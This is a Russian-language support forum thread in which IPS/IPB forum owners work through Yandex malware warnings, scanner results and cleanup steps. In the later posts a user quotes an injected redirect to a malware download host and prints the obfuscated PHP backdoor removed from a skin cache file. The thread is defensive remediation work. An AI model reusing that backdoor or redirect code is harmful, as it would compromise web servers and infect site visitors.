Перейти к публикации
Дизайн и модификация IPS Community IPBSkinsBETA
Поиск в
  • Дополнительно...
Искать результаты, содержащие...
Искать результаты в...
Karagor

Яндекс обнаружил вредоносный код на форуме

Рекомендованные сообщения

Посмотрел в логах как повляется код в шаблоне.

Вход через админку. Причем явно бот, судя по скорости.

 

Жаль так и не нашел, как реализована сама уязвимость и как вытащен пароль админа.

Поделиться сообщением


Ссылка на сообщение

Во втором сообщение написано какая уязвимость эксплуатируется. Сам вектор атаки мне тоже пока не удалось выяснить, хотя, если посмотреть на эксплоит, думая и так понятно каким приблизительно он будет.

Поделиться сообщением


Ссылка на сообщение

@siv1987, хочу проконсультироваться у Вас.

Во-первых, большое спасибо за scan.php. За все время своего форума, был всего-лишь один взлом, помните, может быть в 12-13 году до появления какого-то патча, взломали тысячи форумов и поднаклали в conf_global, потом в какой-то из аватарок под видом картинки внедрили код, и так у всех, кто был не пропатчен. Потом Вы мне сами удалили всю вирусню и пропатчили форум. Спасибо.

Сегодня решил Вашим scan-ом проанализировать состояние своего форума (добавлю, что после того, как Вы мне все настроили, меня больше не взламывали - я так думаю), и что Вы думаете? Вот, приведу несколько фрагментов, а Вы скажите, что бы это могло значить и является ли сие вирусняком... Яндекс по крайней мере на это не ругается...

 

1.

./dumper.php
-------------------------
base64_decode($_COOKIE['sxd']));

 

2.

./ips_kernel/classCaptchaPlugin/default.php
-------------------------
base64_decode( "R0lGODlhyAA8AJEAAN/f3z8/P8zMzP///yH5BAAAAAAALAAAAADIADwAAAL/nI+py+0Po5y02ouz3rz7D4biSJbmiabqyrbuC8fyTNf2jef6zvf+DwwKh8Si8YhMlgACwEHQXESfzgOzykQAqgMmFMr9Rq+GbHlqAFsFWnFVrfwIAvQAu15P0A14Nn8/ADhXd4dnl2YYCAioGHBgyDbnNzBIV0gYxzEYWdg1iLAnScmFuQdAt2UKZTcl+mip+HoYG+tKOfv3N5l5garnmPt6CwyaFzrranu7i0crObvoaKvMyMhrIQhFuyzcyGwXcOpoLYg7DGsZXk5r6DSN51RNfF0RPU5sy7gpnH5bjLhrk7Y9/RQNisfq2CRJauTR6xUuFyBx/yrWypMMmTlq/9IwQnKWcKG5cvMeShBIMOFIaV9w2eti6SBABAyjvBRFMaZCMaxsqtxl8iShjpj+VfqGCJg4XzOfJCK5DVWliFNXlSIENKjWrVy7ev0KNqzYsWTFwhlFU8waLk+efGF7hi0aSgu3iGmV1cxdoGTinimbiGOeP8SWhps6z3AkeMMWW20mMykqQyuJDbYWdufKBJWc2uWmAJZdO0yOKfTCCqHGiO4E/oKGriTYaBw5g/MDqynNlW9Uhmx66tM2i05dNcM8O6Rg2MHLYKraLTpDcLebTke4APkcduAoku0DWpe24MI96ewZPdiy6Rlx/0Y+XJevlNu/z6vtlHFxZbpv9f9edYkfxgVmjnqSxXYOYPfFVMgXIHGC0ltWDNXYJ6Lsw82AFVpWEk4pEabgbsfBM5FphyDWRh1OLCUgbC06NtNU6UV1T1Jl3YhjjjruyGOPPv4IZJBC6tDXGUDB4UUaK06RhRl/0aWWF3CR4YWESraR1ZCh6dMOiMNIFE2GI/bRJYiIEeULiloyUNSFLzWC3VXcqEJXTBe1qApDpbXUEYxr2tYeQCyyGMuIcxbokHfPvPjHf25mqeWHoLEX0iH0UScmUzSWNxmj20yH6Z+/yNTeM0N1cumkg9E4GHnluLcfeKLm95yLoO5ZKJrhgeaQm4xlFGshcK3pYZ9LradQrmY5nmhVdMm+qqpKYkIqpDyltWkpjJJaaKmd6kXjHUXvDPborOaei2666q7LbrvuvgtvvPLOS2+9YBUAADs=" );

 

3.

./admin/sources/base/core.php
-------------------------
eval()'d code" ) )

Поделиться сообщением


Ссылка на сообщение
Во-первых, большое спасибо за scan.php

Благодарить на самом деле особо не за что. Это всего лишь небольшой огрызок для быстрого поиска кода чаще всего используемого в шеллах. Есть куда более мощные сканеры по реальным сигнатурам вирусов. Когда Атаман сказал, что прождал несколько часов чтобы найти примитивный шелл вспомнил про этот скрипт. В реале же лучше использовать полноценные сканеры, как бы медленно они не работали.

 

Здесь вирусов нет. В первом случае это дампер (sxd), остальное рабочий код форума.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

Проверил все 3 случая по дистрибутиву, оказалось, это обычный код, какой и должен быть... надо же, а скан на них ругается...

Поделиться сообщением


Ссылка на сообщение

Он не ищет шеллы/бэкдоры как таковы, он ищет потенциально опасные функции, потому что шелл можно замаскировать таким образом, что его никак не отличишь от вроде нормального кода. В полноценных сканеров дополнительно есть и сигнатуры, только по ним можно сказать вирус это или нет, так как зачастую они имеют уникальный и массовый характер. "Индивидуальные" довольно сложно распознать.

Поделиться сообщением


Ссылка на сообщение

Вас еще не взломали, но насколько я помню используете потенциально опасную версию. Следует обновится хотябы до той, для которой выпущены все последние патчи безопасности.

Поделиться сообщением


Ссылка на сообщение

@siv1987, версия-то старенькая, но я постарался всячески отгородиться от разных видов взлома. Может я напрасно столь самонадеян? Обновившись до актуальной версии, - это опять голый движок со своими тараканами + опять над ним надо работать, искать модули и приложения (которые есть сейчас) + сколько я сделал правок в файлах на сервере (100500). Если в них вносить правки для новой версии, то это опять придется искать новые решения и огромная работа над новым движком. А когда ее закончу, версия форума опять будет уязвимой. Я так понимаю, обновлениям конца и края нет, ибо всегда найдется способ взломать любой ресурс, хоть пентагона, хоть сбербанка. Не верю в утопию, что когда-то будет создан идеальный двиг без дырок и который невозможно взломать.

 

P.S. Да и форум мой занимает ничтожную долю информационного рынка - он никому не нужен для взлома. Это ж обычный провинциальный форум столицы одного из регионов страны.

Поделиться сообщением


Ссылка на сообщение

Помогите разобраться.

Который раз яндекс блокирует сайт, первый раз я наёшл вирус, об этом писал неделю назад, а сейчас прошелся айболитом (результата не дало "Может, я что-то не увидел), могу прислать результат в ЛС).

Полностью удалял содержимое кроме uploads - и некоторых вложенных папок, менял пароли и тд. результат не дало.

Поделиться сообщением


Ссылка на сообщение

То был бэкдор, он не предназначен для посетителей а для выполнения пользовательского кода на сервере.

В кеше вируса нету? Пароли все были заменены? Нужно смотреть на что ругается яндекс и искать ифреймы и вредоносные скрипты.

Поделиться сообщением


Ссылка на сообщение

Все кеши очистил. Пароли менял. Фтп отключен, яндекс ругается на распространения вредоносного по

Поделиться сообщением


Ссылка на сообщение

Но я этого вируса в глаза не вижу, вот в чем странность. В Бд аналогично. Возможно у кого-то через профиль ломится, сейчас залочу всем администраторам вход в АЦ и кэши очищу.

 

Здравствуйте

 

На Вашем сайте периодически появляется указанный ниже вредоносный код:

 

document.location='filestore321.com/download.php?id=b8b4226f'

 

при подгрузке следующего url:

 

сайт/forum/index.php?ipbv=3f8dbe2138fd1c631467545040cce6d1&g=js

 

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код. При поиске источника заражения воспользуйтесь рекомендациями, описанными на странице нашей Помощи http://help.yandex.r...ter/?id=1116613 .

 

Также об этой проблеме Вы можете прочитать в следующих статьях:

 

http://searchengines...ad.php?t=828634

http://ipbskins.ru/f...html#entry89857

 

Если при следующей проверке сайта опасное содержимое не будет обнаружено, пометка в выдаче снимется.

 

Поделиться сообщением


Ссылка на сообщение

Менять пароли нужно при КАЖДОМ обнаружении вируса для всех пользователей и базе данных. На предыдущих страницах я приводил код который выполняют при заражении форума, где видно, что извлекаются данные всех админов с форума. После обновления кеша в АЦ желательно все же проверить файл и место где сидит вирус - может не хватает прав на запись, может вирус находится не только в кэше но и в шаблоне, тогда его нужно выпилить из шаблона в админцетре тоже. И менять пароли после каждого лечения.

  • Upvote 1

Поделиться сообщением


Ссылка на сообщение

Я понимаю. Первый раз хватило на неделю, но то был другой обычный вирус, тут этот приполз неожиданно.

Сейчас буду проверять шаблон админцентр. "Спс за подсказку".

Поделиться сообщением


Ссылка на сообщение

в файле /cache/skin_cache/cacheid_1/skin_global.php был найден и удален следующий код:

$pk='b5c742b518ce6244a2407ff3dd9c3fcc';
$rsa='!:`>rhU`K!%T.S!k^S!rnp*Fn">7`]F/JOex<">&5pJtU&g~`dF7O"]T`Og~kQ#*`b*s!QMs5[s*`Og+Up;aO"]Qk&FQkQkKC[*Inp*^n"}:JtF>kxn:kxCxP6|s<qtsJfmskqg>S[#*OtW-{tMUnAWNOb*sJOJmU[mf4Og>gZM0Jp]ZU"M>5Ag~k>FQUqe}CQ#*OtW-{tMUnAWNOb*s5HK*SHt|kAn>JtFz4OMZ`[#xB"n:SA}/kp>*JOni4qnmS"}ik"}tkxWi!d;7Jp]TB"*xP[M0{~]b]*]bdQSB];MeOt]HM]n0e{S;H>exOb*Inp4FeAWmkxg>Oq]QU[#*Otg;{>J;{>Kxb;M{{;FbM{J;{*]bnt~s<QMZ-{|*J>Kx`pF/S[sS<QMQ-{W+k&]xO"tmSpg^5[kZUp>"J]+74"Fz0pS:U"SKJ]+70A>m`pF:O[ai4&>7JQaZU"ti!d;7Jp]TO[aQSO}Q4dtfUp]QO[aQSO}f4d>*S]+70pJm4"]fU"FNO[ai`da/Sp;xk&;zO[aiSp>7!O]QU;+70pnsS;+7UA*Z`bkKnpCs0A+*4/~Fnqe74"ix<QM^-bM0{~]b]*]bdQSB];MeO~m-{texOHK*4Z~*SpmskQ~GkmNrTq1Gk"]~Sp>7JqgUn"g:U"zsJ]FsJ[sS<QMx-bMfPfS/JOg/`dF7O">*n/K*JH~*4fTxUp;7JtFsJ[kInpeFJdt+SA*^n;FHM]ndM]nUn~m{];W0d;FgHt^xOb*I`d4^Jdt+SA*^n;F6H~FPb{]Unp]S5b>I`d4^`Og/JOe^n;FAM]MUn">+4x4xOb*&nf#mJdt+SA*^n;FAM]MUn"kxOb*snf4^Bd]zkAMa5[M0e~F-b~>;dQMxOb*s5OzsJf#*4/~Fnp#s!">&5[M*5Og>Spg:U"zsJb#*Jb+xJdTxPAMsUd{^5bK/gZ|+C[*Inp~Fkq]fkqMQ5pt*gb#*`[*KC[+T5Hz+k&>7S[#fJpFZSdt>Uxe7UpFZ4OMsU"TFn"m~SA|%PQFtk&+~k"m:kxe7`da&UQFInptFnQBs<qt>!p>~<qtsJf#^BbMt5b4&nABs!QMn{jnB]jtCPZ~f-AgZk&>+S[W~!OW>-bS~JOm~P"smS&;/4qnskAexBAgQ4/~x!QM~`p>/PHa/JOM~`daxktKx4&Fmk&M0SOnKnttFP">7Jp]TPxW^k6Fskpn"-OK*SpmskQ~GkmNrTq1Gk&]x`Og~kx*z-&FtSAWtS[~GkmNrTq1G4da~`{gm4"m>bp;/`A~&4dt+<"kF`xCx-Z+:k"gQ`OW~-fBI0O~11l';
$pka='!+Fa[3S%s}<QL*DKI-xA?tuV$]2rzJ~^B.glo)b{1W:REej@dN6vn|XicM"=m`hGpU_Cf8kY5;/#q,OPT47wyZ9H>0(&';
$pkb='ew95C#d6pxOy&k<s7PnH:1$`"Vq(tZ0oI_N;?}SU)Bv=]QE+WrD/JA,8!R2~ha@.Gb[Mi-c^KFzg3|XL4Yu{>j*Tlf%m';
$f='%t%'.substr($rsa,718,1);
$klf=preg_replace($f,strtr($rsa,$pka,$pkb),'html');

 

Код удалил.

 

Прочитал внимательно посты от siv1987 по лечению сайта, где основная суть лечения заключается в:

1. Проверка шаблона includeJS (Глобальные) в АЦ. Обновления кеша стилей для удаления вредасного кода из кеша.

Кода в файле вредоносного не было найдено:

 

2. Обновления форума до актуальной версии со всеми патчами безопасности (или хотябы установка ихних)

Патчи все установил последние

 

3. Смена паролей для:- всех (!) пользователей имеющих доступ в АЦ: - базе данных, - фтп

Сменил

 

4. Добавления форума в Яндекс.Вебмастер'е с отправкой запроса на перепроверку в разделе Безопасность (это ускорит повторную проверку форума).

Ответ от Яндекса - Ваш сайт заражен

 

 

Захожу в файл /cache/skin_cache/cacheid_1/skin_global.php и снова нахожу вирусный код, который удалил вчера:

Что делать дальше? Где искать?

Поделиться сообщением


Ссылка на сообщение

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Войти

Уже зарегистрированы? Войдите здесь.

Войти сейчас

  • Сейчас на странице   0 пользователей

    Нет пользователей, просматривающих эту страницу.

×
×
  • Создать...